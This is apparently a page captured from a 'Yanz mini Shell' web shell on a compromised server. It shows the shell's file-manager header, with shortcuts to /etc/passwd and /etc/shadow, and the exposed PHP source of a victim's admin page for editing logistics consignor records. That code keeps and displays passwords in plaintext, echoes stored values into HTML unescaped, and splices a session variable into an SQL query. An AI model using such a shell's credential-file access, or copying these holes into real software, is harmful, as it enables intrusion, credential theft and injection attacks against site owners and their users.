Yanz mini Shell

Action

[*] New File
[*] New Folder

Sensitive File

[*] /etc/passwd
[*] /etc/shadow
[*] /etc/resolv.conf

[ Delete ] [ Edit ] [ Rename ] [ Back ]

<?php require_once('header.php'); ?>

<?php if($session_id==1 || $allPermissions['consignor']['update']=="1"){ ?>

<?php
if(isset($_POST['form1'])) {
	$valid = 1;

if(empty($_POST['full_name'])) {
		$valid = 0;
		$error_message .= 'Name can not be empty<br>';
	}

if(empty($_POST['email'])) {
		$valid = 0;
		$error_message .= 'Email can not be empty<br>';
	}
		if(empty($_POST['phone'])) {
		$valid = 0;
		$error_message .= 'Phone can not be empty<br>';
	}
		if(empty($_POST['gst_no'])) {
		$valid = 0;
		$error_message .= 'GST Number can not be empty<br>';
	}

if(empty($_POST['address'])) {
		$valid = 0;
		$error_message .= 'Address can not be empty<br>';
	}
		if(empty($_POST['status'])) {
		$valid = 0;
		$error_message .= 'Status can not be empty<br>';
	}
		if(empty($_POST['password'])) {
		$valid = 0;
		$error_message .= 'Password can not be empty<br>';
	}

if(empty($_POST['air_amt'])) {
		$valid = 0;
		$error_message .= 'Air Amount can not be empty<br>';
	}
	if(empty($_POST['surface_amt'])) {
		$valid = 0;
		$error_message .= 'Surface Amount can not be empty<br>';
	}

$branch_id = $_POST['branch_id'];

// $code=$_POST['pincode'];
// 	$statement = $pdo->prepare("SELECT * FROM pincode where pin_code='$code'");
// 							$statement->execute();
// 							$result = $statement->fetchAll(PDO::FETCH_ASSOC);
// 							$rows = mysqli_num_rows($result);
//                             if($result)
//                             {
//                                 $valid=0;
//                                 $error_message .= 'Pincode Alreay Exist<br>';
//                             }

if($valid == 1) {

$statement = $pdo->prepare("UPDATE tbl_user SET full_name=?, email=?, phone=?,address=?, gst_no=?,location=?, status=?,password=? ,city=?,state=?,pincode=?, branch_id=?,air_amt=?,surface_amt=?,client_id=? WHERE id=?");
    		$statement->execute(array($_POST['full_name'],$_POST['email'],$_POST['phone'],$_POST['address'],$_POST['gst_no'],$_POST['location'],$_POST['status'],$_POST['password'],$_POST['city'],$_POST['state'], $_POST['pincode'], $branch_id,$_POST['air_amt'],$_POST['surface_amt'],$_POST['client_id'],$_REQUEST['id']));

$success_message = 'Consignor is updated successfully!';
	}
}
?>

<?php
if(!isset($_REQUEST['id'])) {
	header('location: logout.php');
	exit;
} else {
	// Check the id is valid or not
	$statement = $pdo->prepare("SELECT * FROM tbl_user WHERE id=?");
	$statement->execute(array($_REQUEST['id']));
	$total = $statement->rowCount();
	$result = $statement->fetchAll(PDO::FETCH_ASSOC);
	if( $total == 0 ) {
		header('location: logout.php');
		exit;
	}
}
?>

<?php
$statement = $pdo->prepare("SELECT * FROM tbl_user WHERE id=?");
$statement->execute(array($_REQUEST['id']));
$result = $statement->fetchAll(PDO::FETCH_ASSOC);

foreach ($result as $row) {
	$full_name = $row['full_name'];
	$email = $row['email'];
	$phone = $row['phone'];
	$address = $row['address'];
	$status = $row['status'];
		$password = $row['password'];
		$gst_no = $row['gst_no'];
		$location = $row['location'];
		$city = $row['city'];
		$state = $row['state'];
		$pincode = $row['pincode'];
		$branch_id = $row['branch_id'];
		$air_amt =$row['air_amt'];
		$surface_amt = $row['surface_amt'];
		$client_id = $row['client_id'];
}
?>

<section class="content">
    <div class="row">
		<div class="col-md-4" style="text-align: left;">
			<h4><i class="fa fa-map-marker"></i> Update Consignor Details</h4>
		</div>
		<div class="col-md-8" style="text-align: right;"> 
		    <a href="user.php" class="btn btn-warning btn-sm"><i class="fa fa-arrow-left"></i> Back to Consignor List</a>
		</div>
	</div> 
	<div class="row">
		<div class="col-md-12">

<?php if($error_message): ?>
			<div class="callout callout-danger">
				<p>
				<?php echo $error_message; ?>
				</p>
			</div>
			<?php endif; ?>

<?php if($success_message): ?>
			<div class="callout callout-success">
				<p><?php echo $success_message; ?></p>
			</div>
			<?php endif; ?>

<form class="form-horizontal" action="" method="post" enctype="multipart/form-data">
				<div class="box box-info">
					<div class="box-body">
					    
					    <input type="hidden" name="update_client_id" id="update_client_id" value="<?=$client_id?>">
					    
					    <div class="form-group">
							<label for="branch_id" class="col-sm-2 control-label required">Branch Name</label>
							<div class="col-sm-6">
								<select name="branch_id" id="branch_id" class="form-control select2" required>
									<?php 
									$condi='';
                        	        if($session['id']!=1 && $session_branch_ids!='0'){
                                        $condi.= " and id IN ($session_branch_ids)";
                                    }
    							       $statement = $pdo->prepare("SELECT * FROM `tbl_branch` WHERE status=1 $condi");
            							$statement->execute();
            							$result = $statement->fetchAll(PDO::FETCH_ASSOC);
                						 foreach($result as $rows) { ?>
										<option value="<?=$rows['id']; ?>" <?php if($branch_id==$rows['id']){ echo "selected";}?>>
											<?=$rows['name']; ?>
										</option>
										<?php } ?>
								</select>
							</div>
						</div>
						
						
						<div class="form-group">
							<label for="client_id" class="col-sm-2 control-label required">Select Client </label>
							<div class="col-sm-6">
								<select name="client_id" id="client_id" class="form-control select2" required>
									<option value=''>Select Client</option>
								</select>
							</div>
						</div>
					    
						<div class="form-group">
							<label for="" class="col-sm-2 control-label">Client Name <span>*</span></label>
							<div class="col-sm-6">
								<input type="text" autocomplete="off" class="form-control" name="full_name" value="<?php echo $full_name; ?>" >
							</div>
						</div>
						
						
						<div class="form-group">
							<label for="" class="col-sm-2 control-label">Email <span>*</span></label>
							<div class="col-sm-6">
								<input type="text" class="form-control" name="email" value="<?php echo $email; ?>">
							</div>
						</div>	
						<div class="form-group">
							<label for="" class="col-sm-2 control-label">Phone Number <span>*</span></label>
							<div class="col-sm-6">
								<input type="text" class="form-control" name="phone" value="<?php echo $phone; ?>">
							</div>
						</div>
							<div class="form-group">
							<label for="" class="col-sm-2 control-label">GST Number <span>*</span></label>
							<div class="col-sm-6">
								<input type="text" class="form-control" name="gst_no" value="<?php echo $gst_no; ?>">
							</div>
						</div>
						<div class="form-group">
							<label for="" class="col-sm-2 control-label">Address <span>*</span></label>
							<div class="col-sm-6">
								<input type="text" class="form-control" name="address" value="<?php echo $address; ?>">
							</div>
						</div>
							<div class="form-group">
							<label for="" class="col-sm-2 control-label">Location <span>*</span></label>
							<div class="col-sm-6">
								<input type="text" class="form-control" name="location" value="<?php echo $location; ?>">
							</div>
						</div>
						<div class="form-group">
							<label for="" class="col-sm-2 control-label">City <span>*</span></label>
							<div class="col-sm-6">
								<input type="text" autocomplete="off" class="form-control" name="city" value="<?php echo $city; ?>">
							</div>
						</div>
							<div class="form-group">
							<label for="" class="col-sm-2 control-label">State <span>*</span></label>
							<div class="col-sm-6">
								<input type="text" autocomplete="off" class="form-control" name="state" value="<?php echo $state; ?>">
							</div>
						</div>	<div class="form-group">
							<label for="" class="col-sm-2 control-label">Pincode <span>*</span></label>
							<div class="col-sm-6">
								<input type="text" autocomplete="off" class="form-control" name="pincode" value="<?php echo $pincode; ?>">
							</div>
						</div>
					
							<div class="form-group">
							<label for="" class="col-sm-2 control-label">Status <span>*</span></label>
							<div class="col-sm-6">
							    <select class="form-control" name="status" id="status">
							        <option >Select Client Status</option>
							        <option value="Active"  <?php if(isset($status)) {if($status=='Active'){echo "selected";}} ?>>Active</option>
							        <option value="Inactive" <?php if(isset($status)) {if($status=='Inactive'){echo "selected";}} ?>>Inactive</option>
							    </select>
							</div>
						</div>
						<div class="form-group">
							<label for="" class="col-sm-2 control-label">Password <span>*</span></label>
							<div class="col-sm-6">
								<input type="text" class="form-control" name="password" value="<?php echo $password; ?>">
							</div>
						</div>
						<div class="form-group">
							<label for="" class="col-sm-2 control-label">Surface Calculation (ex 4500 or 5500) <span>*</span></label>
							<div class="col-sm-6">
								<input type="number" autocomplete="off" class="form-control" name="surface_amt" value="<?=$surface_amt?>" id="surface_amt" required>
							</div>
						</div>
						
						<div class="form-group">
							<label for="" class="col-sm-2 control-label">Air Calculation (ex 4500 or 5500) <span>*</span></label>
							<div class="col-sm-6">
								<input type="number" autocomplete="off" class="form-control" name="air_amt" value="<?=$air_amt?>" id="air_amt" required>
							</div>
						</div>
						<div class="form-group">
							<label for="" class="col-sm-2 control-label"></label>
							<div class="col-sm-6">
								<button type="submit" class="btn btn-success pull-left" name="form1">Submit</button>
							</div>
						</div>
					</div>
				</div>
			</form>
		</div>
	</div>

</section>
<?php }else{ ?>
<center><h4 style="color:red;">You don't have permission to edit client </h4></center>
<?php } ?>

<?php require_once('footer.php'); ?>